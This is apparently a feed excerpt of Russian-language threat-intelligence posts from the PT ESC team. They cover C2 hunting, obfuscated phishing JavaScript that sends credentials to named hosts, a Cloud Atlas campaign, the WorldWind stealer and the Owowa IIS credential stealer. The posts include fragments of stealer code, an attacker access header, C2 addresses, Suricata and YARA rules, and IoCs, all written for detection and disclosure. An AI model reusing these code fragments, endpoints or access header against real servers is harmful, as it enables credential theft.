✅ Самописный сканер</p>
<p>Руками искать по всем сервисам трудозатратно, но все же необходимо, так как каждый сервис может выдать разные результаты. Чтобы снизить затраты на ручной труд, нужна автоматизация. Мы у себя разработали систему SCANDAT, которая имеет внутренний поисковый синтаксис и автоматически генерирует поисковые правила под каждый сервис. </p>
<p>😠 На <em>скриншотах 1–3</em> вы можете увидеть примеры запросов для обнаружения C2 для ВПО GoRed, которое <a href="https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/ex-cobalt-go-red-tehnika-skrytogo-tunnelya/?utm_source=tg_esc&#038;utm_medium=post&#038;utm_campaign=tips&#038;utm_content=17_02" rel="noopener" target="_blank">использует группа ExCobalt.</a> </p>
<p>Кроме того, есть <a href="https://github.com/montysecurity/C2-Tracker" rel="noopener" target="_blank">базовое опенсорс-решение</a> для автоматизации запросов.</p>
<p>В конечном итоге все идентифицированные C2 из нашей системы попадают в продукты компании, повышая уровень обнаружения угроз.</p>
<p>💡 Стоит отметить, что некоторые разработчики MaaS стараются противодействовать таким методам обнаружения. Например, с определенной версии Medusa Stealer ее разработчики убрали title, некоторый контент на странице и добавили генерацию случайных данных в TLS-сертификат, чтобы нельзя было идентифицировать панель управления стилером через популярные сервисы.</p>
<p>Вы можете не только собирать такие серверы и отправлять их в фиды для СЗИ, но и писать эмуляторы сетевого протокола ВПО, чтобы со свежего С2 получить пейлоад или какой-либо модуль. Это позволит вам получить дополнительные индикаторы и атрибуционные признаки.</p>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2025/02/photo_202@17-02-2025_16-33-55-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/02/photo_202@17-02-2025_16-33-55-1024x1024.jpg 1024w, /wp-content/uploads/2025/02/photo_202@17-02-2025_16-33-55-300x300.jpg 300w, /wp-content/uploads/2025/02/photo_202@17-02-2025_16-33-55-150x150.jpg 150w, /wp-content/uploads/2025/02/photo_202@17-02-2025_16-33-55-768x768.jpg 768w, /wp-content/uploads/2025/02/photo_202@17-02-2025_16-33-55.jpg 1238w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="427" src="/wp-content/uploads/2025/02/photo_203@17-02-2025_16-33-55-1024x427.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/02/photo_203@17-02-2025_16-33-55-1024x427.jpg 1024w, /wp-content/uploads/2025/02/photo_203@17-02-2025_16-33-55-300x125.jpg 300w, /wp-content/uploads/2025/02/photo_203@17-02-2025_16-33-55-768x320.jpg 768w, /wp-content/uploads/2025/02/photo_203@17-02-2025_16-33-55.jpg 1200w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#TI</span> <span class="hashtag">#C2</span> <span class="hashtag">#tips</span> <span class="hashtag">#hunt</span> <span class="hashtag">#malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Как давно ты реверсил JavaScript?</title>
		<link>/how-long-have-you-been-reverse-engineering-javascript/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 17 Jan 2025 16:48:07 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[hunt]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[Phishing]]></category>
		<guid isPermaLink="false">/%d0%ba%d0%b0%d0%ba-%d0%b4%d0%b0%d0%b2%d0%bd%d0%be-%d1%82%d1%8b-%d1%80%d0%b5%d0%b2%d0%b5%d1%80%d1%81%d0%b8%d0%bb-javascript/</guid>

					<description><![CDATA[Как давно ты реверсил JavaScript? 😲 Продолжая тему фишинга (ранее мы смотрели на таргетированные подозрительные документы, приводящие к получению первоначального доступа или сбору NTLM-хешей), хотим показать примеры свежих атак, направленных на массового…]]></description>
										<content:encoded><![CDATA[<p><strong>Как давно ты реверсил JavaScript?</strong> 😲</p>
<p>Продолжая тему фишинга (ранее мы смотрели на таргетированные подозрительные документы, приводящие к получению <a href="https://t.me/ptescalator/218" rel="noopener" target="_blank">первоначального доступа</a> или <a href="https://t.me/ptescalator/219" rel="noopener" target="_blank">сбору NTLM-хешей),</a> хотим показать примеры свежих атак, <strong>направленных на массового пользователя, </strong>привыкшего пользоваться продуктами известной компании Microsoft. </p>
<p>Посмотрим, как злоумышленники генерируют поддельные HTML-страницы,<strong> мимикрирующие под формы ввода аутентификационных данных</strong>, с точки зрения JavaScript-кода и применяемых техник обфускации, и даже найдем интересные пасхалки от фишеров. </p>
<p>1️⃣ <strong>Первый пример</strong></p>
<p>Самым примитивным примером из сегодняшней подборки является использование конструкции:</p>
<pre><code>document.write(unescape(atob(</code></pre>
<p>Внутри нее зашит внешний подгружаемый скрипт <code>flyit.com.ar/wp-includes/certificates/js_host/outlk.js</code>, который содержит в себе<strong> jQuery библиотеку</strong> и дополнительный код, отправляющий на <code>campusmin.sitb.edu.ar/completion/classes/php_host/_xls3.php?_do=xxx_form</code> креды пользователя. </p>
<p><em>Минутка ликбеза:</em> функция atob позволяет декодировать base64-строку, а <code>document.write</code> записывает содержимое аргумента в DOM активной страницы, подменяя ее текущее содержимое. В данном случае обфускация минимальная — в основном используется только сжатие (минификация).</p>
<p>2️⃣ <strong>Второй пример</strong></p>
<p>Это более интересный пример, поскольку он содержит много обфусцированного кода. Передаваемая пользователю HTML-страничка содержит только обфусцированный скрипт, который исполняется уже на стороне браузера. </p>
<p>Бесплатные деобфускаторы не справляются с преобразованием кода, поэтому прибегнем к ручному реверсу JavaScript: используемые выделенные функции, методы <code>atob</code> и <code>document.write</code> формируют веб-страницу, которая впоследствии подгружает скрипт с <code>7354770595-1323985617.cos.ap-seoul.myqcloud.com/attach%2Fbootstrap.min.js</code> (обфусцирован с помощью бесплатного сервиса <a href="http://obfuscator.io" rel="noopener" target="_blank">obfuscator.io</a>), где как раз и содержится сбор кредов пользователя. Затем логин и пароль отправляются на C2 злоумышленников — <code>miguel.uscourtaccess.com/next.php</code>.</p>
<p>Сможете найти пасхалочки на скрине? 😏</p>
<p>3️⃣ <strong>Третий пример</strong></p>
<p>В третьем случае для формирования поддельной страницы, представляющую собой брендированную версию стандартной формы ввода аутентификационных данных, используется фишинговый набор <strong>WikiKit</strong>. Он получил свое название за перенаправления на Википедию в случае отключенного в браузере JavaScript или недействительной фишинговой ссылки. Этот скрипт блокирует использование отладочных средств (хотя обойти их в целом несложно), а собранные данные отправляются на <code>cotceur.com</code>. </p>
<p><strong>Какие у нас рекомендации?</strong> 🧐</p>
<p>Кроме «не открывать файлы из подозрительных писем», что кажется неактуальным для этого канала (нам же наоборот интересно их открыть), приведем ряд простых, но важных поинтов, на которые точно стоит обращать внимание при анализе веб-страниц:</p>
<p><strong>•</strong> на вкладке Network браузера проверяйте origin подгружаемых дополнительных ресурсов, все-таки jQuery лучше получать с легитимного домена jQuery или известного CDN.</p>
<p><strong>•</strong> использование функции atob (декодирование base64), еще и с </p>
<pre><code>aHR0cHM6
aHR0cDo</code></pre>
<p>внутри (в результате декодирования получается <code>https:</code> или <code>http:</code>) — поистине страшная смесь! А если добавить к этому <code>document.write</code> (добавления контента в html-документ) и <code>unescape</code> (устаревший метод для декодирования URI) — это точно редфлаг 🚩</p>
<p><strong>•</strong> антидебаггинг, конечно, используется в легитимных целях, но очень редко: стоит задуматься, если встречаете его (эти техники, кстати, можно обойти довольно легко — к примеру, в случае третьего фишинга использовать не горячие клавиши вроде <code>F12</code> или <code>Ctrl+Shift+i</code>, а вручную открыть инструменты в настройках или записать трафик).</p>
<p>💡 Хотим отметить, что не стоит видеть подозрительность везде — например, сжатие кода и популярные виды обфускации часто используют в легитимных проектах! Решили поразбирать JS-код сами just for run и увидели странный POST-запрос? <strong>Будем верить, что вы указали фальшивый пароль</strong> 🤞🏻</p>
<p><strong>Happy hunting!</strong></p>
<figure class="wp-block-image"><img width="1024" height="570" src="/wp-content/uploads/2025/01/photo_175@17-01-2025_16-48-07-1024x570.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/01/photo_175@17-01-2025_16-48-07-1024x570.jpg 1024w, /wp-content/uploads/2025/01/photo_175@17-01-2025_16-48-07-300x167.jpg 300w, /wp-content/uploads/2025/01/photo_175@17-01-2025_16-48-07-768x428.jpg 768w, /wp-content/uploads/2025/01/photo_175@17-01-2025_16-48-07.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="582" src="/wp-content/uploads/2025/01/photo_176@17-01-2025_16-48-07-1024x582.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/01/photo_176@17-01-2025_16-48-07-1024x582.jpg 1024w, /wp-content/uploads/2025/01/photo_176@17-01-2025_16-48-07-300x170.jpg 300w, /wp-content/uploads/2025/01/photo_176@17-01-2025_16-48-07-768x436.jpg 768w, /wp-content/uploads/2025/01/photo_176@17-01-2025_16-48-07.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#hunt</span> <span class="hashtag">#network</span> <span class="hashtag">#phishing</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Облачные сервисы от оператора «МеХаФон»</title>
		<link>/cloud-services-from-the-operator-mehafon/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 15 Nov 2024 15:37:32 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[hunt]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[news]]></category>
		<guid isPermaLink="false">/%d0%be%d0%b1%d0%bb%d0%b0%d1%87%d0%bd%d1%8b%d0%b5-%d1%81%d0%b5%d1%80%d0%b2%d0%b8%d1%81%d1%8b-%d0%be%d1%82-%d0%be%d0%bf%d0%b5%d1%80%d0%b0%d1%82%d0%be%d1%80%d0%b0-%d0%bc%d0%b5%d1%85%d0%b0%d1%84/</guid>

					<description><![CDATA[📲 Облачные сервисы от оператора «МеХаФон» Новости с полей: команда PT ESC наблюдает новую кампанию группировки Cloud Atlas, нацеленную на государственные организации из России и стран СНГ. Про эту группировку мы рассказывали…]]></description>
										<content:encoded><![CDATA[<p>📲 <strong>Облачные сервисы от оператора «МеХаФон»</strong></p>
<p>Новости с полей: команда PT ESC наблюдает новую кампанию группировки Cloud Atlas, нацеленную на государственные организации из России и стран СНГ. Про эту группировку мы рассказывали в нашем исследовании <a href="https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/apt-cloud-atlas-unbroken-threat/" rel="noopener" target="_blank">APT Cloud Atlas: Unbroken Threat</a> и в <a href="https://t.me/ptescalator/46" rel="noopener" target="_blank">посте</a>.</p>
<p>📝 В качестве исходного вектора в своих атаках злоумышленники традиционно используют фишинговые письма с вредоносным вложением «<code>О представлении информации.doc</code>» (VirusTotal 0/62). Рассылка осуществляется с адресов <code>@internet.ru</code>. Такой домен почтового адреса можно получить при регистрации на сервисе <code>mail.ru</code>.</p>
<p>Примечательно, что атакующие не изменяют себе и с 2014 года используют облачные сервисы. При этом они продолжают экспериментировать, и раз за разом в их арсенал добавляются новые популярные платформы. Поэтому в первую очередь мы настоятельно рекомендуем проверить все сессии по протоколу «<a href="https://yandex.ru/dev/disk/doc/ru/" rel="noopener" target="_blank">Яндекс Диск WebDAV</a>» (<code>webdav.yandex.ru</code>) и запросы через <a href="https://developers.google.com/sheets/api/reference/rest" rel="noopener" target="_blank">Google Sheets API</a> (<code>oauth2.googleapis.com</code>, <code>sheets.googleapis.com</code>).</p>
<p><strong>IoCs:</strong></p>
<pre><code>
mehafon.com
technoguides.org

9943fee873c0642216d1578fc4373648b670b5bc47a8bf37366063041518f8b2
</code></pre>
<p>Happy hunting and stay tuned!</p>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32-1024x1024.jpg 1024w, /wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32-300x300.jpg 300w, /wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32-150x150.jpg 150w, /wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32-768x768.jpg 768w, /wp-content/uploads/2024/11/photo_126@15-11-2024_15-37-32.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32-1024x1024.jpg 1024w, /wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32-300x300.jpg 300w, /wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32-150x150.jpg 150w, /wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32-768x768.jpg 768w, /wp-content/uploads/2024/11/photo_127@15-11-2024_15-37-32.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33-1024x1024.jpg 1024w, /wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33-300x300.jpg 300w, /wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33-150x150.jpg 150w, /wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33-768x768.jpg 768w, /wp-content/uploads/2024/11/photo_128@15-11-2024_15-37-33.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#hunt</span> <span class="hashtag">#detect</span> <span class="hashtag">#ioc</span> <span class="hashtag">#apt</span> <span class="hashtag">#news</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Стилерная инфекция: новый USB-штамм</title>
		<link>/stealer-infection-a-new-usb-strain/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Tue, 12 Nov 2024 19:12:50 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[C2]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[hunt]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[suricata]]></category>
		<guid isPermaLink="false">/%d1%81%d1%82%d0%b8%d0%bb%d0%b5%d1%80%d0%bd%d0%b0%d1%8f-%d0%b8%d0%bd%d1%84%d0%b5%d0%ba%d1%86%d0%b8%d1%8f-%d0%bd%d0%be%d0%b2%d1%8b%d0%b9-usb-%d1%88%d1%82%d0%b0%d0%bc%d0%bc/</guid>

					<description><![CDATA[Стилерная инфекция: новый USB-штамм 👾 Сегодня расскажем про обнаруженную нами необычную модификацию стилера WorldWind. Это самый что ни на есть настоящий вирус, передающийся через тесный контакт зараженного устройства с USB-носителем и вызывающий…]]></description>
										<content:encoded><![CDATA[<p><strong>Стилерная инфекция: новый USB-штамм</strong> 👾</p>
<p>Сегодня расскажем про обнаруженную нами необычную модификацию <strong>стилера WorldWind</strong>. Это самый что ни на есть настоящий вирус, передающийся через тесный контакт зараженного устройства с USB-носителем и вызывающий не только утечку конфиденциальной информации, но и потерю бесценной коллекции ПО на внешних дисках. </p>
<p>Находка, как и ее предшественники, все также продолжает использовать сервисы <code>icanhazip</code>, <code>mylnikov.org</code> + Google Карты для определения внешнего IP-адреса и геолокации (<em>скриншот 1</em>). Реализация модуля сбора информации тоже не изменилась, за исключением пары структур.</p>
<p>🐔  <strong>Мутации же затронули сетевую часть и набор функций стилера.</strong> Теперь он не передает информацию через Telegram. Вместо этого сообщения улетают на С2-сервер злоумышленников в следующем порядке: checkin → exfiltration → close. Форматы этих сообщений представлены <em>на скриншоте 2</em>.</p>
<p>Из стилера также пропали функции для кражи VPN-конфигов и паролей от игровых лончеров и Wi-Fi. Но взамен развилась способность агрессивно распространяться через USB-носители. Если на внешнем диске есть экзешники, то стилер удалит их и запишет себя под их именами (<em>скриншот 3</em>).</p>
<p><strong>Не находите, что повеяло старыми добрыми временами дикого вирусописательства?</strong> 😏</p>
<p>Чтобы уменьшить риск заражения, ставьте сигнатурные прививки и проходите антивирусные осмотры.</p>
<p><strong>Заодно давайте покроем стилер правилом, детектирующим checkin:</strong></p>
<pre><code>
alert tcp any any -&gt; any any (msg: &quot;STEALER [PTsecurity] WorldWind checkin&quot;; flow: established, to_server; stream_size: client, &lt;, 80; stream_size: server, =, 1; content: &quot;|46 00 00 00|&quot;; startswith; fast_pattern; content: &quot;{|22|id|22 3a| 0&quot;; within: 8; content: &quot;|22|hwid|22 3a|&quot;; within: 10; content: !&quot;|20|&quot;; distance: 2; within: 32; content: &quot;|22|country|22 3a|&quot;; distance: 32; content: !&quot;,&quot;; distance: 0; classtype: trojan-activity; metadata: malware_family WorldWind; sid: 1; rev: 1;)
</code></pre>
<p><strong>IOCs:</strong></p>
<pre><code>
84d52de2b69e14f26259da07297e02eb2c4ac32045a690f65a267fe931da0433
20.208.136.72:12346
</code></pre>
<p>Будьте здоровы и happy hunting!</p>
<figure class="wp-block-image"><img width="1024" height="640" src="/wp-content/uploads/2024/11/photo_120@12-11-2024_19-12-50-1024x640.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/11/photo_120@12-11-2024_19-12-50-1024x640.jpg 1024w, /wp-content/uploads/2024/11/photo_120@12-11-2024_19-12-50-300x188.jpg 300w, /wp-content/uploads/2024/11/photo_120@12-11-2024_19-12-50-768x480.jpg 768w, /wp-content/uploads/2024/11/photo_120@12-11-2024_19-12-50.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="640" src="/wp-content/uploads/2024/11/photo_121@12-11-2024_19-12-50-1024x640.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/11/photo_121@12-11-2024_19-12-50-1024x640.jpg 1024w, /wp-content/uploads/2024/11/photo_121@12-11-2024_19-12-50-300x188.jpg 300w, /wp-content/uploads/2024/11/photo_121@12-11-2024_19-12-50-768x480.jpg 768w, /wp-content/uploads/2024/11/photo_121@12-11-2024_19-12-50.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#hunt</span> <span class="hashtag">#C2</span> <span class="hashtag">#detect</span> <span class="hashtag">#ioc</span> <span class="hashtag">#malware</span> <span class="hashtag">#network</span> <span class="hashtag">#suricata</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Да кто такие эти ваши PhaseShifters?</title>
		<link>/who-even-are-these-phaseshifters-of-yours/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Fri, 01 Nov 2024 11:57:04 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[hunt]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%b4%d0%b0-%d0%ba%d1%82%d0%be-%d1%82%d0%b0%d0%ba%d0%b8%d0%b5-%d1%8d%d1%82%d0%b8-%d0%b2%d0%b0%d1%88%d0%b8-phaseshifters/</guid>

					<description><![CDATA[😲 Да кто такие эти ваши PhaseShifters? В начале июня 2024 года специалисты департамента Threat Intelligence выявили новую цепочку атаки PhaseShifters. ✍️ PhaseShifters (Sticky Werewolf, UAC-0050 ❓) — хакерская группировка, занимающаяся шпионажем,…]]></description>
										<content:encoded><![CDATA[<p>😲 <strong>Да кто такие эти ваши PhaseShifters?</strong></p>
<p>В начале июня 2024 года специалисты департамента Threat Intelligence выявили новую цепочку атаки PhaseShifters.</p>
<p>✍️ <strong>PhaseShifters </strong>(Sticky Werewolf, UAC-0050 ❓) — хакерская группировка, занимающаяся шпионажем, атаки которой направлены на различные отрасли стран Восточной Европы, в том числе на государственные учреждения, сферу экономики и промышленности. </p>
<p>В своих атаках группировка использует фишинг: злоумышленники отправляют письма якобы от официальных лиц с просьбой ознакомиться с документом и подписать его. Документ находится во вложении внутри защищенного паролем архива. В качестве ВПО злоумышленники используют Rhadamanthys, DarkTrack RAT, Meta Stealer и другие.</p>
<p>🔍 Мы наблюдаем высокую активность группировки с весны 2023 года и уже тогда заметили одну странную деталь. Дело в том, что атаки группировки PhaseShifters по техникам <strong>идентичны атакам другой группировки — UAC-0050</strong>. Более того, атаки проходят с небольшим временным промежутком, то есть группировки одинаково атакуют с разницей в несколько недель — месяц.</p>
<p>На данный момент мы склоняемся к тому, что UAC-0050 и PhaseShifters — это одна и та же группировка, но убедиться в этом можно будет только после более длительного наблюдения.</p>
<p>⚠️ <strong>И это случилось снова&#8230;.</strong> </p>
<p>Летом этого года обе группировки начали использовать идентичные паттерны в своих атаках. Дошло даже до того, что ВПО группировок располагалось в одном и том же репозитории BitBucket. Это заставило нас углубиться в эту тему.</p>
<p>📰  Какая атака обнаружена, какие сходства мы увидели, кого атаковали, а также при чем здесь TA558 и бразильские обфускаторы и криптеры — все это вы можете узнать <a href="https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/deti-ne-spisyvaem-novye-tehniki-gruppirovki-phase-shifters/?utm_source=tg_esc&#038;utm_medium=post&#038;utm_campaign=apt&#038;utm_content=1_11" rel="noopener" target="_blank">в нашей статье</a>.</p>
<p><span class="hashtag">#TI</span> <span class="hashtag">#Hunt</span> <span class="hashtag">#Malware</span> <span class="hashtag">#APT</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>OWOWA</title>
		<link>/owowa/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Thu, 31 Oct 2024 18:16:17 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[hunt]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[win]]></category>
		<category><![CDATA[yara]]></category>
		<guid isPermaLink="false">/owowa/</guid>

					<description><![CDATA[⚠️ OWOWAсный модуль, или IIS кOWOWAрен Про вредоносный IIS-модуль Owowa, предназначенный для перехвата учетных записей пользователей, исследователи рассказывали еще в 2021 году. А в 2022 году мы рассказывали про его эволюцию на…]]></description>
										<content:encoded><![CDATA[<p>⚠️ <strong>OWOWA</strong>сный модуль, или IIS к<strong>OWOW</strong>Aрен</p>
<p>Про вредоносный IIS-модуль Owowa, предназначенный для перехвата учетных записей пользователей, исследователи <a href="https://securelist.ru/owowa-credential-stealer-and-remote-access/104228/" rel="noopener" target="_blank">рассказывали</a> еще в 2021 году.</p>
<p>А в 2022 году <a href="https://2022.offzone.moscow/getfile/A.Grigoryan_D.Koloskov_APT%20attacks%20on%20Russian%20companies%20in%20H1%202022-%20highlights.pdf" rel="noopener" target="_blank">мы рассказывали</a> про его эволюцию на OFFZONE. Как показывает практика, используя этот IIS-модуль, атакующие за достаточно короткий временной промежуток могут скомпрометировать большое количество учетных записей и получить пароли пользователей в открытом виде.</p>
<p>Модуль устанавливается в системе командой <code>appcmd.exe install module</code>. Во всех проанализированных нами образцах базовый класс, который реализует интерфейс <a href="https://learn.microsoft.com/ru-ru/dotnet/api/system.web.ihttpmodule?view=netframework-4.8.1" rel="noopener" target="_blank">IHttpModule</a>, называется <code>ExtenderControlDesigner</code>. После запуска модуль методом <a href="https://learn.microsoft.com/en-us/dotnet/api/system.web.httpapplication.presendrequestcontent?view=netframework-4.8.1" rel="noopener" target="_blank">PreSendRequestContent</a> перехватывает входящие запросы.</p>
<pre><code>
  public class ExtenderControlDesigner : IHttpModule
  {
    public void Init(HttpApplication context)
    {
      context.PreSendRequestContent += this.PreSend_RequestContent;
    }
    private void PreSend_RequestContent(object sender, EventArgs e)
    {...
</code></pre>
<p>Злоумышленники продолжают использовать этот достаточно простой IIS-модуль в своих самых громких атаках на российские компании и в 2024 году. Так, расследуя один из инцидентов ИБ, команда PT ESC обнаружила модификацию стилера Owowa. В обновленной версии атакующие отказались от записи скомпрометированных учетных данных в журнал в файловой системе. Вместо этого они хранятся в <a href="https://learn.microsoft.com/ru-ru/dotnet/api/system.collections.generic.hashset-1?view=net-8.0" rel="noopener" target="_blank">HashSet</a> в оперативной памяти.</p>
<p><strong>Пример учетных данных, которые записываются в HashSet:</strong></p>
<pre><code>
ExtenderControlDesigner.Data item = new ExtenderControlDesigner.Data
    {
      Id = text,
      UserName = userName,
      Password = pass,
      UserHostAddress = userHostAddress,
      XForwardedFor = xForwardedFor,
      DateTimeUtc = dateTimeUtc
    };
    bool flag2 = !ExtenderControlDesigner.hashSetData.Contains(item);
    if (flag2)
    {
      ExtenderControlDesigner.hashSetData.Add(item);
    }
</code></pre>
<p>Данные, как и раньше, защищены алгоритмом <code>RSA-2048</code>, а публичный ключ захардкожен в модуле. Для получения информации о количестве уникальных записей можно произвести поиск сигнатуры <code>42 5A 68 00</code>, она является разделителем учетных записей.</p>
<pre><code>
memoryStream.Write(new byte[]
    {
      66,
      90,
      104,
      0
    }, 0, 4);
</code></pre>
<p>Так как публичный ключ модуля, использовавшегося в атаках на компании в России, всегда идентичен и не менялся с 2022 года, мы можем предположить, что за всеми атаками с его применением стоит одна группа злоумышленников.</p>
<p>Зашифрованный список учетных записей злоумышленники получают отправив корректный GET-запрос с заголовком <code>username: ZaDS0tojX0VDh82</code>.</p>
<p><strong>Пример GET-запроса в журналах IIS-сервера:</strong></p>
<pre><code>
2024-07-29 14:32:21 127.0.0.1 GET /owa/  443 ZaDS0tojX0VDh82 127.0.0.2 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 401 1 1527 14
</code></pre>
<p>Помимо перехвата полей <code>username</code>, <code>password</code> в новой версии были добавлены перехваты <code>LOGON_USER</code>, <code>AUTH_PASSWORD</code>.</p>
<p>В последней версии злоумышленники отказались от функции <code>RunCommand</code>, которая выполняла команды на скомпрометированном узле через <code>powershell.exe</code>.</p>
<p><strong>IoCs:</strong></p>
<pre><code>
Name               MD5
ClassLibrary2.dll  af6507e03e032294822e4157134c9909
ClassLibrary3.dll  2d240b6ceeaacd2e3dd52c9e7d3fb622
ClassLibrary3.dll  5cc433a2550bb7389f6c90521e7afa25
ExtenderControlDesigner.dll  967e7b6b048d628f36bbb4ca7b0f483f
ClassLibrary3.dll   e657eea3b9b7317e28ab4a89c1fa2177
ClassLibrary3.dll   6e6218aac341463496cca32f52b29013
ClassLibrary3.dll  4d66a3bbaf65a2ec36fd2d143c872ef6
</code></pre>
<p><strong>YARA:</strong></p>
<pre><code>
rule Owowa {
  strings:
    $s1 = &quot;IHttpModule&quot;
    $s2 = &quot;PreSend_RequestContent&quot;
    $s3 = &quot;ExtenderControlDesigner&quot;
$u1 = &quot;283c00ecp774ag36boljbpp6&quot; wide
    $u2 = &quot;dEUM3jZXaDiob8BrqSy2PQO1&quot; wide
    $u3 = &quot;Fb8v91c6tHiKsWzrulCeqO&quot; wide
    $u4 = &quot;jFuLIXpzRdateYHoVwMlfc&quot; wide
    $u5 = &quot;oACgTsBMliysfk&quot; wide
    $u6 = &quot;uW4sSY1CAkN6kI6r6ByXUWnK&quot; wide
    $u7 = &quot;ZaDS0tojX0VDh82&quot; wide
    $u8 = &quot;zwa879pOX1NAmTom8m3aQvoZ&quot; wide
  condition:
    uint16be ( 0 ) == 0x4d5a and ( 2 of ( $s* ) ) and ( 2 of ( $u* ) ) and filesize &lt; 20KB
} 
</code></pre>
<p>Happy hunting!</p>
<figure class="wp-block-image"><img width="1024" height="354" src="/wp-content/uploads/2024/10/photo_104@31-10-2024_18-16-17-1024x354.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/10/photo_104@31-10-2024_18-16-17-1024x354.jpg 1024w, /wp-content/uploads/2024/10/photo_104@31-10-2024_18-16-17-300x104.jpg 300w, /wp-content/uploads/2024/10/photo_104@31-10-2024_18-16-17-768x266.jpg 768w, /wp-content/uploads/2024/10/photo_104@31-10-2024_18-16-17.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
